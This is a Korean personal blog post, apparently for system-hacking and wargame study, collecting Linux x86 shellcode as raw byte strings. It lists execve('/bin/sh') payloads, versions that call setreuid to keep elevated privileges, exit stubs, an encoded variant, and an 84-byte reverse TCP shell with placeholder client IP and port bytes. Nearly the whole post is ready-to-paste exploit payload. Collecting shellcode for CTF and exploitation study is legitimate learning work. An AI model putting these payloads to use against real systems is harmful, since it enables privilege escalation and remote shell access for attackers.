[시스템] 쉘 코드 모음

Notice

Recent Posts

Recent Comments

Link

« 2024/10 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

ghkdtlwns987

[시스템] 쉘 코드 모음 본문

시스템

[시스템] 쉘 코드 모음

2020/03/31 2020. 11. 16. 00:03

0x01. 가장 기본적으로 쉘을 띄우는 코드

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 25

미포함 : setreuid(), exit()

0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 31

미포함 : setreuid()

0x03. setreuid(geteuid(), getreuid()) 까지 포함시킨 쉘 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 41

0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 47

0x04. exit(0) 코드

\x31\xc0\xb0\x01\xcd\x80

bytes : 6

0x05. setreuid(geteuid(), geteuid()) 코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

bytes : 16

0x06. Linux/x86 execve /bin/sh shellcode

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

bytes : 23

0x07. linux x86 파일명 shellcode

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

bytes : 48

0x08. setreuid(geteuid(), geteuid()) system("/bin/sh")

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff

bytes : 54

0x09. 0x2f가 없는 쉘코드

\x68\xf9\xbf\x0f\x40\x68\xe0\x91\x03\x40\xb8\xe0\x8a\x05\x40\x50\xc3

0x0a Reverse TCP shellcode (84byte)

"\x68"+\
"\xc0\xa8\x7e\x8c"+\ #<- Client IP_ADDR
"\x5e\x66\x68"+\
"\x1e\x61"+\ #<- Client Port_ADDR
"\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02"+\
"\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79"+\
"\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a"+\
"\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f"+\
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"+\
"\xeb\xce"

0x0b Ubuntu 16.04 shellcode (for DreamHack) (len 26)

"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

'시스템' 카테고리의 다른 글

RTL 원리 (Dummy 를 넣어주는 이유?) (0)	2020.12.11
[시스템] dl_fini (0)	2020.11.18
stdout 으로 libc leak (3)	2020.11.10
FSOB(_IO_flush_all_lockp ) (0)	2020.10.10
flose() 분석 (0)	2020.10.10

'시스템' Related Articles

Comments

ghkdtlwns987

[시스템] 쉘 코드 모음 본문

[시스템] 쉘 코드 모음

'시스템' 카테고리의 다른 글

티스토리툴바